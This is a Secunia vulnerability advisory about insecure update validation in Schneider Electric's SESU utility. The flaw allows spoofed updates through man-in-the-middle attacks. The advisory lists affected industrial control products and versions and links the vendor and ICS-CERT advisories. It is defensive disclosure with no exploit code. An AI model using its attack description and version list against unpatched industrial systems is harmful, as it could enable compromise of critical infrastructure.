http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in multiple Schneider Electric products, which can be exploited by malicious people to conduct spoofing attacks. The vulnerability is caused due to the Schneider-Electric Software Update (SESU) utility insecurely validating new updates and can be exploited to e.g. spoof an update via Man-in-the-Middle (MitM) attacks. The vulnerability is reported in the following products and versions: * IDS version 1.0 * IDS version 2.0 * PowerSuite version 2.5 * Smart Widget Acti 9 version 1.0.0.0 * Smart Widget H8035 version 1.0.0.0 * Smart Widget H8036 version 1.0.0.0 * Smart Widget PM210 version 1.0.0.0 * Smart Widget PM710 version 1.0.0.0 * Smart Widget PM750 version 1.0.0.0 * SoMachine version 1.2.1 * Spacial.pro versions 1.0.0.x * SESU versions 1.0.x * SESU versions 1.1.x * Unity Pro version 5.0 * Unity Pro version 6.0 * Unity Pro version 6.1 * Unity Pro version 4.1 * Vijeo Designer versions 6.0.x * Vijeo Designer versions 6.1.0.x * Vijeo Designer versions 5.0.0.x * Vijeo Designer versions 5.1.0.x * Vijeo Designer Opti versions 6.0.x * Vijeo Designer Opti versions 5.1.0.x * Vijeo Designer Opti versions 5.0.0.x * Web Gate Client Files version 5.1.x SOLUTION: Update the SESU client to a fixed version. PROVIDED AND/OR DISCOVERED BY: The vendor credits Arthur Gervais. ORIGINAL ADVISORY: Schneider: http://download.schneider-electric.com/files?p_File_Id=29960974&p_File_Name=SEVD-2013-009-01.pdf ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-13-016-01.pdf OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------